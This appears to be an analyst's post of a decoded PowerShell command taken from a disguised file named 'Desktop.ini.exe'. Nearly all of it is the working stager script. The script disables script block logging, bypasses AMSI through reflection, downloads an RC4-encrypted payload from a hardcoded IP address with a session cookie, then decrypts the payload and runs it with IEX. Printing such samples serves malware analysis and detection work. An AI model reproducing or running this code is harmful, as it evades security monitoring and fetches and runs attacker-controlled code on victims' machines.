Desktop.ini.exe powershell base64 decoded command

IF($PSVERsIONTablE.PSVERSIOn.Major -gE 3)
{
	$GPF=[reF].ASseMBLY.GetTYpE('System.Management.Automation.Utils')."GETFie`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');

	If($GPF)
	{
		$GPC=$GPF.GetValuE($nULl);
		IF($GPC['ScriptB'+'lockLogging'])
		{
			$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
			$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0
		}

		$vAL=[CoLleCTionS.GeNeRic.DICTionARy[sTrINg,SYStem.OBJECt]]::nEw();
		$vAL.ADD('EnableScriptB'+'lockLogging',0);
		$VaL.ADd('EnableScriptBlockInvocationLogging',0);
		$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$Val
	}
	ELse
	{
		[ScrIpTBlocK]."GETFIe`Ld"('signatures','N'+'onPublic,Static').SEtVALUE($null,(New-ObjEctCOlLECTioNs.GeNERIC.HaShSET[strInG]))
	}

	[ReF].AsSemBly.GeTTYPe('System.Management.Automation.AmsiUtils')|?{ $_ }| %{$_.GetFIelD('amsiInitFailed','NonPublic,Static').SETVaLue($Null,$truE)};
};

[SYstem.NEt.SERviCePoiNtMAnAgEr]::ExPECT100ConTiNue=0;
$wc=New-OBjeCTSystEM.Net.WEbClient;
$u='Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko';
$Wc.HeaDErS.AdD('User-Agent',$u);
$wC.PrOXy=[SYSTem.NeT.WEbRequESt]::DeFAUltWEBProXY;
$Wc.PrOXY.CREdENTIAlS=[SYStem.NEt.CredENtIALCAChe]::DEfAuLtNeTwoRkCREDeNtIALS;
$Script:Proxy=$wc.Proxy;
$K=[SysteM.TeXt.EnCoDIng]::ASCII.GETBYTEs('81c3b080dad537de7e10e0987a4bf52e');
$R={
	$D,$K=$ARGs;
	$S=0..255;
	0..255|% {
		$J=($J+$S[$_]+$K[$_%$K.Count])%256;
		$S[$_],$S[$J]=$S[$J],$S[$_]
	};
	$D|%{
		$I=($I+1)%256;
		$H=($H+$S[$I])%256;
		$S[$I],$S[$H]=$S[$H],$S[$I];
		$_-BXOr$S[($S[$I]+$S[$H])%256]
	}
};
$ser='http://46.29.163.222:9999';
$t='/admin/get.php';
$wC.HEAdeRs.ADD("Cookie","session=jbWUS4FOkzKjPDqMrYuDTzCiaVY=");
$dATa=$WC.DownLoADDAtA($ser+$T);
$iv=$DaTa[0..3];
$Data=$DAtA[4..$DaTA.lENGTH];
-JOIN[ChAR[]](&$R$daTa($IV+$K))|IEX